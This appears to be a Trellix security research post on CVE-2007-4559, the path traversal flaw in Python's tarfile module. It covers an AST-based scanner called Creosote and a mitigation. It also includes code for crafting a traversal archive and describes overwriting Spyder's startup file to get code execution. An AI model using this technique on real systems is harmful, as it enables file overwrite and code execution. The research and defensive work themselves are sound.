
Tarfile: Exploiting the World With a 15-Year-Old Vulnerability

While investigating an unrelated vulnerability, the Trellix Advanced Research Center stumbled across a vulnerability in Python’s tarfile module. Initially we thought we had found a new zero-day, but as we dug into the issue, we realized it was in fact CVE-2007-4559. The vulnerability is a path traversal flaw in the extract and extractall functions of the tarfile module that allows an attacker to overwrite arbitrary files by adding the “..” sequence to filenames in a TAR archive.

Over the course of our research into its impact, we found that hundreds of thousands of repositories were affected by this vulnerability. Although it was originally given a CVSS score of only 6.8, we were able to confirm that in most cases an attacker can turn the file write into code execution. In the video below, we show how we got code execution by exploiting Universal Radio Hacker:

Video: Universal Radio Hacker exploit demo (YouTube)

This post dives into the technical details of the vulnerability and shows how easy it is for an attacker to write an exploit for it. Along the way, we also explore how we wrote a tool that automatically detects the tarfile vulnerability in source code by analyzing the code’s abstract syntax tree (AST) rather than its raw text. Finally, we walk through how we exploited a popular open-source repository, using the path traversal attack to achieve code execution.

The tarfile vulnerability

A tar archive (tarfile) is a collection of files together with the metadata needed to unpack them later. The metadata stored for each file includes, among other things, the file name, the file size, a header checksum, and information about the file’s owner at the time it was archived. In Python’s tarfile module this information is represented by the TarInfo class, one instance of which is generated for every “member” of a tar archive. Members can represent many types of filesystem objects, including regular files, directories, and symbolic links.
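As a hypothetical illustration of that metadata, the sketch below builds a tiny archive in memory (a notes directory and a notes/readme.txt file, both made up for this example) and reads back a few TarInfo fields for each member. Only standard tarfile calls are used; the helper names are our own.

```python
import io
import tarfile
from typing import List, Tuple


def build_sample_archive() -> bytes:
    """Build a small in-memory tar archive containing a directory and a file."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        # A directory member carries metadata only, no payload.
        dir_info = tarfile.TarInfo(name="notes")
        dir_info.type = tarfile.DIRTYPE
        dir_info.mode = 0o755
        tar.addfile(dir_info)

        # A regular file member carries metadata plus the file contents.
        data = b"hello from tarfile\n"
        file_info = tarfile.TarInfo(name="notes/readme.txt")
        file_info.size = len(data)
        file_info.uname = "alice"  # hypothetical owner name
        tar.addfile(file_info, io.BytesIO(data))
    return buf.getvalue()


def describe_members(archive: bytes) -> List[Tuple[str, str, int, str]]:
    """Return (name, kind, size, owner) for every TarInfo in the archive."""
    rows = []
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r") as tar:
        for info in tar.getmembers():
            kind = "dir" if info.isdir() else "symlink" if info.issym() else "file"
            rows.append((info.name, kind, info.size, info.uname))
    return rows


if __name__ == "__main__":
    for row in describe_members(build_sample_archive()):
        print(row)
```

Note that the name field is just a string chosen by whoever created the archive; nothing forces it to be a harmless relative path.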

Figure 1: Path Joining with the Filename

In the image above we can see a snippet of code from the extract function in the tarfile module. It shows how the target filename is constructed before being passed to the function that extracts the member and writes it to the filesystem. The code trusts the information in the TarInfo object without validating it: it joins the path passed to extract with the name stored in the TarInfo object, so a name containing “..” components resolves to a location outside the intended directory. This is what allows an attacker to perform a directory traversal attack.
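The effect of that unchecked join can be shown with plain path arithmetic. This is a minimal sketch, not the tarfile source: naive_target mirrors the join described above, and the extraction directory and member name are hypothetical. posixpath is used so the result is the same on every OS.

```python
import posixpath


def naive_target(extract_dir: str, member_name: str) -> str:
    """Join the extraction path and the member name with no validation."""
    return posixpath.join(extract_dir, member_name)


def resolved(path: str) -> str:
    """Collapse '..' components to show where the write actually lands."""
    return posixpath.normpath(path)


if __name__ == "__main__":
    target = naive_target("/tmp/extract", "../../home/user/.bashrc")
    print(target)            # /tmp/extract/../../home/user/.bashrc
    print(resolved(target))  # /home/user/.bashrc
```

Each “..” in the member name cancels one directory of the extraction path, so two of them are enough to climb out of /tmp/extract entirely.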

Figure 2: Extractall Looping Through Archive Members

As the figure above shows, extractall loops over the archive’s members and relies on the extract function for each one, so it is equally vulnerable to the directory traversal attack.

The tarfile exploit

For an attacker to take advantage of this vulnerability, they need to add “..” followed by the operating system’s path separator (“/” or “\”) to the file name so that it escapes the directory the file is supposed to be extracted to. Python’s tarfile module lets us do exactly this:

Figure 3: Crafting a Malicious Archive

The add method in the tarfile module accepts a filter function that receives each file’s TarInfo metadata and can modify it before the file is added to the tar archive. This lets attackers create their exploits with as few as the six lines of code above.
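Because Figure 3 is an image, here is a hedged reconstruction of the same idea using the filter parameter of TarFile.add, rather than the exact code in the figure. The file names hacked.txt and payload.tar are placeholders. The sketch only builds the archive; a vulnerable extractall on it would write hacked.txt one directory above the chosen extraction path.

```python
import os
import tarfile
import tempfile


def add_traversal_prefix(info: tarfile.TarInfo) -> tarfile.TarInfo:
    """TarFile.add filter: rewrite the stored name so it climbs one directory."""
    info.name = "../" + info.name
    return info


def build_malicious_archive(workdir: str) -> str:
    """Create payload.tar in workdir whose single member is '../hacked.txt'."""
    payload = os.path.join(workdir, "hacked.txt")
    with open(payload, "w") as fh:
        fh.write("written outside the extraction directory\n")
    archive = os.path.join(workdir, "payload.tar")
    with tarfile.open(archive, "w") as tar:
        # arcname keeps the stored name independent of where workdir lives;
        # the filter then prepends "../" before the member is written.
        tar.add(payload, arcname="hacked.txt", filter=add_traversal_prefix)
    return archive


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        path = build_malicious_archive(tmp)
        with tarfile.open(path) as tar:
            print(tar.getnames())  # ['../hacked.txt']
```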

Building creosote

After discovering that the tarfile module was still vulnerable, we wanted a way to automatically check repositories for the vulnerability so that we could assess how widespread it was. To do this we built Creosote, a Python script that recursively scans directories for .py files and analyzes each one it finds. Creosote then prints out any files that may contain the vulnerability, sorted into three categories by confidence level: Vulnerable, Probably Vulnerable, and Potentially Vulnerable.
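The file-discovery step could look something like the sketch below. This is an assumption for illustration, not Creosote’s code: Path.rglob stands in for however Creosote actually walks directories, and the Confidence enum simply names the three report categories.

```python
import enum
import pathlib
from typing import List


class Confidence(enum.Enum):
    """Report buckets, from most to least certain."""
    VULNERABLE = "Vulnerable"
    PROBABLY_VULNERABLE = "Probably Vulnerable"
    POTENTIALLY_VULNERABLE = "Potentially Vulnerable"


def find_python_files(root: str) -> List[pathlib.Path]:
    """Recursively collect every .py file under root, sorted for stable output."""
    return sorted(p for p in pathlib.Path(root).rglob("*.py") if p.is_file())
```

For example, calling find_python_files on a checked-out repository returns every Python source file beneath it, which can then be handed one by one to the AST analysis.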

To analyze Python code, Creosote uses Python’s ast module, which lets the script traverse the constructs of the source code instead of crudely parsing text and working around spacing to find the vulnerabilities. Using the ast module and its NodeVisitor class, Creosote can quickly filter out many extract and extractall functions that have nothing to do with the vulnerability by only analyzing calls made through an Attribute node. We can make this distinction because extract and extractall are instance methods, so they always appear in the code base together with the archive object they are called on (e.g., tar.extractall()).
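A minimal sketch of the Attribute-node filter, assuming nothing about Creosote beyond what is described above: an ast.NodeVisitor that records only calls whose func is an Attribute named extract or extractall. The class name and sample source are hypothetical.

```python
import ast

TARGET_METHODS = {"extract", "extractall"}


class ExtractCallFinder(ast.NodeVisitor):
    """Collect (line, method) for calls shaped like obj.extract(...) or obj.extractall(...)."""

    def __init__(self) -> None:
        self.hits = []

    def visit_Call(self, node: ast.Call) -> None:
        func = node.func
        # A method call is a Call whose func is an Attribute (obj.attr);
        # a bare extract(...) call has a Name here instead and is skipped.
        if isinstance(func, ast.Attribute) and func.attr in TARGET_METHODS:
            self.hits.append((node.lineno, func.attr))
        self.generic_visit(node)  # keep walking into arguments and nested calls


def find_extract_calls(source: str) -> list:
    finder = ExtractCallFinder()
    finder.visit(ast.parse(source))
    return finder.hits


SAMPLE = """
import tarfile
def extract(x):
    return x
extract(1)  # bare name: not an Attribute, ignored
with tarfile.open("a.tar") as tar:
    tar.extractall("out")
"""

if __name__ == "__main__":
    print(find_extract_calls(SAMPLE))  # [(7, 'extractall')]
```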

After finding an Attribute node, Creosote looks for the two most common code patterns that the team found while analyzing this vulnerability:

Figure 4: Vulnerable Extractall

If Creosote finds an Attribute node for extractall, it backtracks to check whether open was also called and whether its second argument, the opening mode, was set to “r”. Depending on how many of these criteria are met, the script marks the line as Vulnerable, Probably Vulnerable, or Potentially Vulnerable.
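The backtracking step can be approximated with a file-level check. This is a hypothetical sketch: the two criteria (an open call, and an explicit read mode) come from the description above, but the mapping from criteria met to category is our assumption, and a real tool would also tie the open call to the same object that calls extractall.

```python
import ast
from typing import Optional


def _method_name(call: ast.Call) -> Optional[str]:
    """Name of the method for calls like obj.name(...), else None."""
    return call.func.attr if isinstance(call.func, ast.Attribute) else None


def _literal_mode(call: ast.Call) -> Optional[str]:
    """Literal mode string passed as the second positional arg or as mode=."""
    candidates = list(call.args[1:2]) + [kw.value for kw in call.keywords if kw.arg == "mode"]
    for node in candidates:
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            return node.value
    return None


def classify_extractall(source: str) -> Optional[str]:
    """Bucket a file that calls extractall() using two hypothetical criteria."""
    calls = [n for n in ast.walk(ast.parse(source)) if isinstance(n, ast.Call)]
    if not any(_method_name(c) == "extractall" for c in calls):
        return None  # nothing to report for this file
    opens = [c for c in calls if _method_name(c) == "open"]  # e.g. tarfile.open(...)
    # Only an explicit read mode ("r", "r:gz", ...) counts here, even though
    # tarfile.open() also reads when the mode is omitted.
    read_mode = any((_literal_mode(c) or "").startswith("r") for c in opens)
    score = int(bool(opens)) + int(read_mode)
    return ["Potentially Vulnerable", "Probably Vulnerable", "Vulnerable"][score]
```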

Figure 5: Vulnerable Extract Loop

Another common pattern is calling extract inside a for loop that iterates over all the members of the archive. The previous case could have been detected simply by scanning lines of text rather than the AST, but loops are harder because there are many ways to iterate over the members. In the Universal Radio Hacker snippet below, for example, the loop iterates over members wrapped in the enumerate function. Because it works on the AST, Creosote can detect loops over getmembers in any form they may appear.
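A hedged sketch of the loop check, not Creosote’s code: for every for loop, walk the entire iterable expression looking for a getmembers() call, so wrappers such as enumerate(tar.getmembers()) are still caught, then look for an .extract() call anywhere in the loop body.

```python
import ast


def _is_method_call(node: ast.AST, name: str) -> bool:
    """True for calls shaped like obj.name(...)."""
    return (isinstance(node, ast.Call)
            and isinstance(node.func, ast.Attribute)
            and node.func.attr == name)


def find_extract_loops(source: str) -> list:
    """Line numbers of for loops over getmembers() whose body calls .extract()."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, (ast.For, ast.AsyncFor)):
            continue
        # Search the whole iterable, so enumerate(...), sorted(...), etc. still match.
        iterates_members = any(_is_method_call(n, "getmembers") for n in ast.walk(node.iter))
        calls_extract = any(_is_method_call(n, "extract")
                            for stmt in node.body for n in ast.walk(stmt))
        if iterates_members and calls_extract:
            hits.append(node.lineno)
    return hits


LOOP_SAMPLE = """
import tarfile
with tarfile.open("a.tar") as tar:
    for i, member in enumerate(tar.getmembers()):
        tar.extract(member, "out")
    for name in tar.getnames():
        print(name)
"""

if __name__ == "__main__":
    print(find_extract_loops(LOOP_SAMPLE))  # [4]
```

One gap worth noting: a TarFile object is itself iterable, so a loop written as for member in tar: would not be flagged by this sketch.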

Figure 6: Vulnerable Extract Loop in URH

Exploiting the tarfile vulnerability in the real world

Spyder is a free and open-source scientific development environment for Python that runs on Windows, macOS, and Linux.

While running Creosote, we discovered a vulnerability in the Spyder repository:

Figure 7: Creosote Output for Spyder

Figure 8: Vulnerable Code in Spyder

After looking through the codebase, we found that the load_dictionary function is called whenever a user imports a .spydata file in the Variable Explorer. Spydata files are used to save and transfer variables between projects and scripts, and can be shared between users.

Figure 9: Spyder Variable Explorer

Now that we knew we could use the import data button to load a malicious file, we needed to test it. The first step was to find out where the extraction directory was located. Before calling extractall, the program creates a temporary folder and calls chdir on it; chdir changes the current working directory to the folder passed to it. This indicates that Spyder extracts the archive into a temporary folder. After looking into what mkdtemp does, we found that on Windows it creates a temporary directory inside C:\Users\ \AppData\Local\Temp.

With an understanding of where the imported file lands, it was time to see whether the directory traversal attack could get us outside of that directory. To do this we imported a .spydata file that would normally be extracted to C:\Users\ \AppData\Local\Temp\{TEMP_FOLDER}; because of the path traversal, however, we expected our file to appear in C:\Users\ \AppData\:
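The number of “..” components follows from directory depth. Assuming the extraction folder sits directly inside Temp, as described above, it is three levels below AppData (Local, Temp, and the temporary folder itself), so a member name needs three “..” components to land in AppData. The post does not give the exact member name used; the user name alice and the folder name tmpabc123 below are hypothetical. ntpath is used so the Windows path arithmetic runs on any OS.

```python
import ntpath


def landing_path(extract_dir: str, member_name: str) -> str:
    """Resolve a member name against a Windows extraction dir, collapsing '..'."""
    return ntpath.normpath(ntpath.join(extract_dir, member_name))


if __name__ == "__main__":
    temp_folder = r"C:\Users\alice\AppData\Local\Temp\tmpabc123"  # hypothetical
    print(landing_path(temp_folder, "../../../hacked.txt"))
    # C:\Users\alice\AppData\hacked.txt
```

ntpath accepts both “/” and “\” as separators, which is why either form works in a member name aimed at Windows.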

Figure 10: New File in AppData

After importing the .spydata file, we can see a new hacked.txt file inside the AppData directory, which means our attack worked. However, an error also appears in Spyder:

Figure 11: Spyder Error Message

We now had two goals: to exploit the IDE without an error appearing, and to turn our file write into code execution. Luckily, the error message contained extra details that helped us solve both problems. The details showed the exception and the line of code that raised it, which happened to be the line right after the extractall call. A quick look at that line showed that the program expects a single .pickle file to have been extracted from the .spydata file. The details also helped with code execution: they showed that the Python files run by the program reside under AppData\Local and can therefore be modified or overwritten without administrator privileges.

After looking through the codebase, we decided that the best place to add code was mainwindow.py, since it always runs when the application is opened, before the main window is created but after the application has checked whether it can run. We then copied the file, added code that pops up a message box, and packed it into a new .spydata file, this time together with a valid .pickle file for the variable importer:

Figure 12: Success Notification Code

After the new .spydata file is imported, the IDE loads the valid variables and continues uninterrupted instead of showing an error message. When the program is reopened, the popup we added to its startup code appears:

Figure 13: Successful Exploit

While code execution by itself can be devastating, we did not want to stop there. Watch the demo video below to see how we added code that tries to socially engineer the victim into giving the attacker code execution with administrator privileges:

Video: Spyder exploit demo (YouTube)

The tarfile exploit lets an attacker escalate the file write to code execution on more than just Windows. Watch the video below to see how we were able to exploit Polemarch, an IT infrastructure management service running on Linux and Docker:

Video: Polemarch exploit demo (YouTube)

As we have demonstrated above, this vulnerability is incredibly easy to exploit, requiring little to no knowledge about complicated security topics. Due to this fact and the prevalence of the vulnerability in the wild, Python’s tarfile module has become a massive supply chain issue threatening infrastructure around the world. Our team at Trellix is leading the charge by patching as many open-source repositories as possible as well as providing a way to scan closed source repositories. We hope that you will join us in our attempt to strengthen the security of code bases around the world.
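The patches themselves are not reproduced in this post. As a minimal sketch of the kind of check a fix needs, assuming the archive is untrusted, every member’s resolved destination can be validated before anything is extracted. The helper names is_within_directory and safe_extractall are illustrative, not part of tarfile.

```python
import os
import tarfile


def is_within_directory(directory: str, target: str) -> bool:
    """True if target resolves to directory itself or a path beneath it."""
    base = os.path.realpath(directory)
    dest = os.path.realpath(target)
    # commonpath raises ValueError on Windows if the paths are on different
    # drives; that also aborts the extraction, which is the safe outcome.
    return os.path.commonpath([base, dest]) == base


def safe_extractall(tar: tarfile.TarFile, path: str = ".") -> None:
    """Validate every member name before extracting anything."""
    for member in tar.getmembers():
        if not is_within_directory(path, os.path.join(path, member.name)):
            raise ValueError(f"blocked path traversal in member {member.name!r}")
    if hasattr(tarfile, "data_filter"):
        # Extraction filters are available: add tarfile's own "data" checks too.
        tar.extractall(path, filter="data")
    else:
        tar.extractall(path)
```

This validates member names only; link members whose targets point outside the directory need a similar check. Where tarfile supports extraction filters (Python 3.12, plus security releases of some earlier versions), the sketch also passes filter="data", which applies tarfile’s own, more thorough checks.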

This document and the information contained herein describes computer security research for educational purposes only and the convenience of Trellix customers. Trellix conducts research in accordance with its Vulnerability Reasonable Disclosure Policy. Any attempt to recreate part or all of the activities described is solely at the user’s risk, and neither Trellix nor its affiliates will bear any responsibility or liability.
